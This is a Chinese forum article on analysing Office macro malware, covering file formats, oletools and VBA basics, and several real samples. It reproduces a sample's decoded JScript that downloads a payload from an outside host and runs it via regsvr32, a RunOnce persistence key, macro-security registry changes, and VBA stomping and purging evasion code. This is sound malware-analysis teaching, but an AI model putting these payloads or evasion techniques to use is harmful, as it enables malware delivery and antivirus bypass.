其他
office病毒分析资料整理
本文为看雪论坛精华文章
一
office文件格式
Office2007之前的版本为OLE复合格式:doc,dot,xls,xlt,pot,ppt;
Office2007之后的版本为OpenXML格式:docx,docm,dotx,xlsx,xlsm,xltx,potx。
1、OLE复合格式(Object Linking and Embedding Data Structures)
复合文档将数据分成许多流(Steams),流存储在不同的Storages里。符合文档采用NTFS(NT File System)格式。
流又分成更小的数据扇区(sectors)。数据扇区可能包含控制数据或用户数据。
整个文件由一个头结构(Header)结构以及Sectors组成,头结构确定了Sectors的大小,每个Sector的大小相同。
使用offVis对doc文件进行解析:主要包括4个方面Header、FAT、MinFAT、DirectoryEntry。
FileHeader(文件头):固定512字节。记录了ole文件的关键信息。
结构如下图,比较重要的字段前面会标*号:
struct OLEGUID { unsigned int dw1; unsigned short w1; unsigned short w2; unsigned char aby[8];}; struct FileHeader{ unsigned char sig[8];//*特征码0xD0 0xCF 0x11 0xE0 0xA1 0xB1 0x1A 0xE1 OLEGUID oleguid;//ClassID unsigned short VerMinor;//修订号 unsigned short VerDll;//版本号 unsigned short ByteOrder;//*文档存储模式0xFE0xFF:小端。0xFF0xFE大端 unsigned short SectorShit;//*表示sector的大小。2^n unsigned short MiniSecShift;//*MiniSector的大小。2^n unsigned short Reserved1;//保留 unsigned int Reserved2;//保留 unsigned int NumDirSects;//*DirectorySectors目录扇区数量 unsigned int NumFatSects;//*FAT数量 unsigned int DirSect;//*Directory开始的SectorID unsigned int TransactSig;//0 unsigned int MiniStrMax;//最小Stream的最大值,默认4096 unsigned int MiniFatSect;//*MiniFAT表开始的SectorID unsigned int NumMiniFatSects;//*MiniFAT表数量 unsigned int DifatSect;//*DIFAT开始的SectorID unsigned int NumDifatSects;//*DIFAT的数量 unsigned int DiFat[109];//109个DIFAT};brFAT&MiniFAT
特殊ID值扇区:
DirectoryEntry:
复合文档中其实存放着很多内容,这么多内容需要有个目录,那么Directory就是这个目录。从Header中我们可以读取出Directory开始的SectorID,我们可以定位到这个位置(0x200 + sectorSize * dirStartSectorID)。Directory中每个DirectoryEntry固定为128字节。
//office DirectoryEntry数据结构struct Element { wchar_t Name[32];//Directory名字 unsigned short NameLength;//Name长度 unsigned char Type;//节点类型。0:非法;1:目录(storage);2:节点(Stream);5:根节点 unsigned char Flags;//节点颜色 unsigned int sidLeft;//左兄弟EntryID unsigned int sidRight;//右兄弟EntryID unsigned int sidChild;//孩子节点EntryID OLEGUID ClsID; unsigned int UserFlags;//一般为0 __int64 CreateTime;//创建时间 貌似不是时间戳的格式 __int64 ModifyTime;//文件修改时间 unsigned int StartSect;//DirectoryEntry开始的SectorID unsigned int SizeLow;//Directory存储的所有字节长度 unsigned int SizeHigh;//保留置0};br2、OpenXML
新的文件格式实际上是标准的ZIP文件格式,我们可以像打开其他ZIP文件一样来打开Open XML的文档文件,里面包含着XML文件、RELS文件以及一些其他文件。
文档结构:
│ [Content_Types].xml //描述文档各个部分的ContentType,协助程序解析文档│├─docProps│ app.xml//程序级别的文档属性,如:页数、文本行数、程序版本等│ core.xml//用户填写的文档属性,如:标题、主题、作者等│├─word│ │ document.xml//word文档的正文│ │ fontTable.xml//word文档的页脚│ │ settings.xml//│ │ styles.xml│ │ vbaData.xml//vba属性,是否auoopen,是否加密│ │ vbaProject.bin//记录vba工程信息 ole│ │ webSettings.xml│ ││ ├─theme│ │ theme1.xml//记录样式,颜色编号,字体大小等等│ ││ └─_rels│ document.xml.rels//文档间的关系│ vbaProject.bin.rels//记录vba文件│└─_rels .rels//描述各个部分之间的关系br3、使用oletools解析
安装oletools:
pip install -U oletoolsbr3.1 分析ole文档结构工具
olebrowse:浏览器的方式查看;
olemeta:获取文档的属性数据,如作者,修改日期等;
二
VBA简单学习
最简单的VBA的编辑器就是office(word、excel等)。
2.1 开启vba宏
2.2 简单的vba
2.3 基本概念
模块:编写代码的区域。
函数:可以在程序的任何地方调用。Function和End Function关键字之间写代码。
子过程:没有返回值。在Sub和End Sub关键字之间写代码。
注释:以单引号(‘)开头或者以"REM"开头表示注释。
VBA变量&常量:
命名变量的基本规则:变量名第一个字符必须为字母;变量名不能使用的字符:空格 ! @ & $ #;变量名长度不超过255个字符;不能使用VB保留关键字作为变量名。
变量声明:Dim <<variable_name>> As <<variable_type>>常量声明Const <<constant_name>> As <<constant_type>> = <<constant_value>>br数字类型数据:
非数字数据类型:
VBA运算符:
算术操作符:+-*/%^(加、减、乘、除、取余、指数)比较运算符:和其他语言一样。(<>为不相等比较)逻辑运算符:AND、OR、NOT、XOR连接运算符:+和&(两个变量为数字时A=5,B=10,A+B=15,A&B=510 ;两个变量为字符串时都是拼接字符串)brif条件判断If(expression1) Then Statement1Elseif(expression2) Then Statement2Elseif Statement3End If switch语句Select Case expression Case expressionlist1 statement1 statement2 .... .... statement1n Case expressionlist2 statement1 statement2 .... .... Case expressionlistn statement1 statement2 .... .... Case Else elsestatement1 elsestatement2 .... ....End Select for循环For counter = start To end [Step stepcout] statement1 statement2 Exit ForNext for each循环For Each item In Group statement1Next While循环While condition(s) statemnets1Wend Do While循环Do statements1Loop While condition(s) 中途退出for循环Exit For中途退出Do while循环Exit DobrVBA字符串:
VBA数组:
Dim arr(5)br可以对很多事件写代码进行处理,如SelectionChange为选择框发生改变时触发:
VBA文本文件:
Dim text1 As StringsSet fso = CreateObject("Scripting.FileSystemObject")Set stream = fso.OpenTextFile("F:\worksp\vba\Support.log", ForWriting, True)text1 = "text1"stream.WriteLine text1stream.ClosebrDim FilePath As StringFilePath = "F:\workplace\test.txt"Open FilePath For Output As #2Dim text1 As Stringtext1 = "test1"Write #2, "test1"text1 = "text2"Write #2, "test2"Close #2MsgBox ("Write text")b三
恶意文档分析实践
3.1 案例一(了解一般分析方法)
简单执行效果,提示linkSelectTmp.jpg不是可执行文件(存在写文件),cc服务器已经关闭。
所以最终目标:1、分析出文档具体行为。2、找到cc服务器。
提取vba:提取vba脚本 olevba.exe -c .\report.06.21.doc > vba.txt。
olevba 0.60 on Python 3.9.5 - http://decalage.info/python/oletools===============================================================================FILE: .\report.06.21.docType: OpenXML-------------------------------------------------------------------------------VBA MACRO ThisDocument.clsin file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -(empty macro)-------------------------------------------------------------------------------VBA MACRO procedureSize.basin file: word/vbaProject.bin - OLE stream: 'VBA/procedureSize'- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Function globView(countPoint)Debug.Print Shell("" + indexClassInit("explorer "))End FunctionFunction indexClassInit(countPoint, Optional procIteratorCaption = "c:\progra", Optional nextBooleanConv = "ta")indexClassInit = countPoint & procIteratorCaption & "mdata\linkSelectTmp.h" & nextBooleanConvEnd FunctionFunction collectClassH(arr As Variant)Dim out As Stringout = ""For cnt = 1 To UBound(arr)out = out & Chr(arr(cnt) Xor 100)NextcollectClassH = outEnd Function-------------------------------------------------------------------------------VBA MACRO rightCaptReference.basin file: word/vbaProject.bin - OLE stream: 'VBA/rightCaptReference'- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Sub autoopen()functionVIntegerqueryWin = globView("")End Sub-------------------------------------------------------------------------------VBA MACRO classRem.basin file: word/vbaProject.bin - OLE stream: 'VBA/classRem'- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Sub functionVInteger()Open indexClassInit("") For Output As #1Print #1, collectClassH(collectException)Close #1End SubFunction collectException()collectException = Split(ActiveDocument.Range.Text, "x")End Functionbr分析VBA脚本:
functionVInteger:将文本的内容解密并写入c:\programdata\linkSelectTmp.hta;
indexClassInit:将字符串进行与“c:\programdata\linkSelectTmp.ht”进行拼接。
html><body><div id='vbMemoryCaption'>fX17KWUoaGN0YWN9O2Vzb2xjLmVsZ25pU3lyYXJiaWw7KTIgLCJncGoucG1UdGNlbGVTa25pbFxcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZvdGV2YXMuZWxnbmlTeXJhcmJpbDspeWRvYmVzbm9wc2VyLldrbmlMdGFkKGV0aXJ3LmVsZ25pU3lyYXJiaWw7MSA9IGVweXQuZWxnbmlTeXJhcmJpbDtuZXBvLmVsZ25pU3lyYXJiaWw7KSJtYWVydHMuYmRvZGEiKHRjZWpiT1hldml0Y0Egd2VuID0gZWxnbmlTeXJhcmJpbCByYXZ7eXJ0eykwMDIgPT0gc3V0YXRzLldrbmlMdGFkKGZpOykoZG5lcy5Xa25pTHRhZDspZXNsYWYgLCJnOFlVRjBqQ1l1NDJCRT0mWTBBWHgwTllQMk9XVWhzTGlvWVAxd2EzRGxqPWRpYyZjODU3NWl1VU1mVFp4PWVnYXAmYUNrYlZtVjdCd0RZdHV2VmxjM0J0MWtiRFQ9ZWdhcCZjRTlKUmZtSmhINVRtd1p2dktlbUNVc0k3Mj1lZ2FwJkYwQm9QOWN0MlVxeWxxNHlobnBTUlVmcURHPWhjcmFlcyZSWmptNVdYU3d3c0hQWmRTODc5PThjRFJZMUJmaSY1Z3Q0V3hhVU89cmVzdSZmN3FnaGUyNnFoUkxKcD05SWhJRj8xMXljb2YvNzA0MjIvbWdkQ29PekZNSkZ5SFFyT05vZ3RkYTQ0RHRnRGM0S0h6ZVVpVExHWC9zSHh2OTRHTi9wem5pbS8wNzcyNy9hRFQ4Lzk4NDU4L2FkZGEvbW9jLmRzYmJvaHlkYWVybGEvLzpwdHRoIiAsIlRFRyIobmVwby5Xa25pTHRhZDspInB0dGhsbXguMmxteHNtIih0Y2VqYk9YZXZpdGNBIHdlbiA9IFdrbmlMdGFkIHJhdg==aGV5OykiZ3BqLnBtVHRjZWxlU2tuaWxcXGNpbGJ1cFxcc3Jlc3VcXDpjIDIzcnZzZ2VyIihudXIuYlZlcnVkZWNvclBjbnVmOykidGNlamJvbWV0c3lzZWxpZi5nbml0cGlyY3MiKHRjZWpiT1hldml0Y0Egd2VuID0gY2lyZW5lR3JlZHJvQmVtYW4gcmF2OykibGxlaHMudHBpcmNzdyIodGNlamJPWGV2aXRjQSB3ZW4gPSBiVmVydWRlY29yUGNudWYgcmF2aGV5msscriptcontrol.scriptcontrol</div><div id='funcSize'>ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/</div><script language='javascript'>function lengthD(memoryText){return(new ActiveXObject(memoryText));}function intLTpl(memoryTable){return(documentTextboxListbox.getElementById(memoryTable).innerHTML);}function linkVal(){return(intLTpl('funcSize'));}function buttProcLibrary(s){var e={}; var i; var b=0; var c; var x; var l=0; var a; var windowVariantQuery=''; var w=String.fromCharCode; var L=s.length;var constC = borderMain('tArahc');for(i=0;i<64;i++){e[linkVal()[constC](i)]=i;}for(x=0;x<L;x++){c=e[s[constC](x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2)))&&(windowVariantQuery+=w(a));}}return(windowVariantQuery);};function borderMain(mainCount){return mainCount.split('').reverse().join('');}sizeIntLibrary = window;documentTextboxListbox = document;sizeIntLibrary.resizeTo(1, 1);sizeIntLibrary.moveTo(-100, -100);var rightHCur = documentTextboxListbox.getElementById('vbMemoryCaption').innerHTML.split("aGV5");var bytesLZero = borderMain(buttProcLibrary(rightHCur[0]));var arrMemory = borderMain(buttProcLibrary(rightHCur[1]));var pointerInteger = rightHCur[2];</script><script language='vbscript'>Function viewDelVar(vbMemoryCaption)Set screenTrustConst = CreateObject(pointerInteger)With screenTrustConst.language = "jscript".timeout = 360000End WithscreenTrustConst.eval(vbMemoryCaption)End Function</script><script language='vbscript'>Call viewDelVar(bytesLZero)</script><script language='vbscript'>Call viewDelVar(arrMemory)</script><script language='javascript'>sizeIntLibrary['close']();</script></body></html>brvar datLinkW = new ActiveXObject("msxml2.xmlhttp");datLinkW.open("GET", "http://alreadyhobbsd.com/adda/85489/8TDa/72770/minzp/NG49vxHs/XGLTiUezHK4cDgtD44adtgoNOrQHyFJMFzOoCdgm/22407/focy11?FIhI9=pJLRhq62ehgq7f&user=OUaxW4tg5&ifB1YRDc8=978SdZPHswwSXW5mjZR&search=GDqfURSpnhy4qlyqU2tc9PoB0F&page=27IsUCmeKvvZwmT5HhJmfRJ9Ec&page=TDbk1tB3clVvutYDwB7VmVbkCa&page=xZTfMUui5758c&cid=jlD3aw1PYoiLshUWO2PYN0xXA0Y&=EB24uYCj0FUY8g", false);datLinkW.send();if (datLinkW.status == 200) { try { var librarySingle = new ActiveXObject("adodb.stream"); librarySingle.open; librarySingle.type = 1; librarySingle.write(datLinkW.responsebody); librarySingle.savetofile("c:\\users\\public\\linkSelectTmp.jpg", 2); librarySingle.close; } catch(e) {}} var funcProcedureVb = new ActiveXObject("wscript.shell");var nameBorderGeneric = new ActiveXObject("scripting.filesystemobject");funcProcedureVb.run("regsvr32 c:\\users\\public\\linkSelectTmp.jpg");br1、访问目标网站,将得到的内容保存导入
2、linkSelectTmp.hta解密vb脚本向;
http://alreadyhobbsd.com/adda/85489/8TDa/72770/minzp/NG49vxHs/XGLTiUezHK4cDgtD44adtgoNOrQHyFJMFzOoCdgm/22407/focy11?FIhI9=pJLRhq62ehgq7f&user=OUaxW4tg5&ifB1YRDc8=978SdZPHswwSXW5mjZR&search=GDqfURSpnhy4qlyqU2tc9PoB0F&page=27IsUCmeKvvZwmT5HhJmfRJ9Ec&page=TDbk1tB3clVvutYDwB7VmVbkCa&page=xZTfMUui5758c&cid=jlD3aw1PYoiLshUWO2PYN0xXA0Y&=EB24uYCj0FUY8g发送get请求获取linkSelectTmp.jpg3、linkSelectTmp.hta执行“regsvr32 c:\users\public\linkSelectTmp.jpg”。
3.2 案例二(了解如何动态调试)
在文档关闭的时候会自动关闭,所以优先关注Sub Document_Close():
使用oledump提取vba脚本,有很多注释语句,变量名也被混淆了,正好是个不错的样本,需要动态调试查看。
创建了一个文件,直接查看比较麻烦,通过设置断点,查看变量的方法可以容易的知道创建的文件为"C:\Users\abel\Downloads\deer.ini",后续要关注这个文件。
接着上面就是大量的字符串拼接,之后应该会进行解密写文件操作,可以跳过这段代码下断点。
Set oShell = CreateObject("Shell.Application")CallByName oShell, "ShellExecute", VbMethod, "wscript.exe", "C:\Users\abel\Downloads\deer.ini //e:VBScript //b", "", "", 0br"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\deer", "wscript.exeC:\Users\abel\Downloads\deer.ini //e:VBScript //b", "REG_SZ"。
首先创建了一个字符串"C:\Users\abel\deer.exe":
写注册表:
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\AccessVBOM为1HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\VBAWarningsbr"SELECT * FROM Win32_PingStatus WHERE Address=" + "'coagula.online'"br可以使用debug.print调试输出url,得到一个url“http://83.166.240.31/get.php?independent=”。
可惜这个url已经关闭了,没法继续往下分析。
小结:
(4)设置两个注册表:
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings;
(5)获取coagula.online的ip;
3、案例三(模板注入的病毒)
众所周知docx的文档是没有宏是安全的(漏洞除外),所以docx这类不存在宏的文档就安全了吗?这里还是从any.run上找了一个apt标签的office文档(因为apt标签用这个技术的比较多)。
使用olevba进行查看并没有vba脚本,但是oleid显示存在External Relationships:
四1
office病毒常见的隐藏和反调试方法
4.1 源码、p-code和exe-code
pcode:存储的是pcode伪代码,是vba宏代码被vba编辑器编译之后的代码。
execode:只要在pcode代码至少执行一次之后才会出现,存储的是pcode执行的痕迹。execode代码存储在SRP_目录中。
_VBA_PROJECT和SRP_#流:版本和实现信息。
4.2 VBA stomping
将恶意的源码与非恶意的VBA源码进行交换,保留p-code不变。攻击能够成功取决于office版本,office版本和目标的office版本相同时,office会优先执行p-code中的代码。
创建一个非恶意的fakeMssage.vba:
Sub autoopen()MsgBox "fakeMessage"Sub EndbrEvilClippy.exe -n abcdefg -n ThisDocument -s fakevba.vba doc.docbr使用word查看效果,vba编辑器仍然能看到源码,因为当vba执行时,office会根据p-code修复源码。
使用Structured Storages Viewer查看,可以看到源码内容已经被修改。
使用olevba对doc_EvilClippy_stomping.doc进行查看,分析得到的vba代码已经出错。pcode部分还是能看到源码正常,且已经提示存在vba stoming。
可以使用pcode2code库来提取源码:
小结:
VBA stoming方法主要是针对一些自动检测工具进行干扰,降低杀软报毒的可能性,对于手动分析没有干扰效果。
4.3 VBA purging
从模块流和_VBA_PROJECT流中删除Pcode,将MODULEOFFSET的值更改为0,并删除所有SRP流。更容易绕过AV检测和YARA规则(导致一些分析工具失效,貌似对手动分析并没影响),
可以使用https://github.com/fireeye/OfficePurge完成相关操作。
2、解析“dir”流内容解析出module的名字和源码的offset。(比如doc.doc中abcdefg模块的偏移为1307)
3、循环提取源码到OG_VBACode,移除pcode,再重新设置VBA中对应模块源码。(如下源码)
// Get the CompressedSourceCode from module streamBytes = commonStorage.GetStorage("VBA").GetStream(vbaModule.moduleName).GetData();string OG_VBACode = Utils.GetVBATextFromModuleStream(streamBytes, vbaModule.textOffset);// Remove P-code from module stream and set the module to only have the CompressedSourceCodestreamBytes = Utils.RemovePcodeInModuleStream(streamBytes, vbaModule.textOffset, OG_VBACode);commonStorage.GetStorage("VBA").GetStream(vbaModule.moduleName).SetData(streamBytes);br// Change offset to 0 so that document can find compressed source code.commonStorage.GetStorage("VBA").GetStream("dir").SetData(Utils.Compress(Utils.ChangeOffset(dirStream)));Console.WriteLine("\n[*] Module offset changed to 0."); // Remove performance cache in _VBA_PROJECT stream. Replace the entire stream with _VBA_PROJECT header.byte[] data = Utils.HexToByte("CC-61-FF-FF-00-00-00");commonStorage.GetStorage("VBA").GetStream("_VBA_PROJECT").SetData(data);Console.WriteLine("\n[*] PerformanceCache removed from _VBA_PROJECT stream."); // Check if document contains SRPs. Must be removed for VBA Purging to work.try{ commonStorage.GetStorage("VBA").Delete("__SRP_0"); commonStorage.GetStorage("VBA").Delete("__SRP_1"); commonStorage.GetStorage("VBA").Delete("__SRP_2"); commonStorage.GetStorage("VBA").Delete("__SRP_3"); Console.WriteLine("\n[*] SRP streams deleted!");}brHiding macros:当文档运行p-code时,VBA引擎会根据p-code修复源码。所以只要p-code运行,使用vba编辑器查看到的就还是源码。
// Hide modules from GUIif (optionHideInGUI){ foreach (var vbaModule in vbaModules) { if ((vbaModule.moduleName != "ThisDocument") && (vbaModule.moduleName != "ThisWorkbook")) { Console.WriteLine("Hiding module: " + vbaModule.moduleName); projectStreamString = projectStreamString.Replace("Module=" + vbaModule.moduleName, ""); } } // Write changes to project stream commonStorage.GetStream("project").SetData(Encoding.UTF8.GetBytes(projectStreamString));}br本文大部分内容为收集整理,参考链接在文章最后面。
参考文章:
Office文件的奥秘——.NET平台下不借助Office实现Word、Powerpoint等
文件的解析(一)
https://www.cnblogs.com/mayswind/archive/2013/03/17/2962205.html
office 复合文档数据结构解析“初探”
https://blog.csdn.net/Cody_Ren/article/details/103886098
Tools to extract VBA Macro source code from MS Office Documents
http://www.decalage.info/en/vba_tools
复合文档的二进制存储格式研究[ole存储结构]整理
https://blog.csdn.net/chaoguodong/article/details/80402291
https://github.com/decalage2/oletools/wiki
https://www.yiibai.com/vba
https://blog.csdn.net/qq_38474570/article/details/88382677?spm=1001.2014.3001.5501
https://www.sec-in.com/article/67
https://www.secrss.com/articles/10705
https://www.52pojie.cn/thread-1287476-1-1.html
https://www.52pojie.cn/thread-1298869-1-1.html
https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/
https://github.com/fireeye/OfficePurge
https://www.yuque.com/p1ut0/qtmgyx/mbwnvq
https://www.fireeye.com/blog/threat-research/2020/11/purgalicious-vba-macro-obfuscation-with-vba-purging.html
test文件夹为最简单的宏的doc,用于测试特性和工具;样本文件夹为any.run下载样本,解压密码infected。
END
看雪ID:tobeabel
https://bbs.pediy.com/user-home-755584.htm
# 往期推荐
球分享
球点赞
球在看
点击“阅读原文”,了解更多!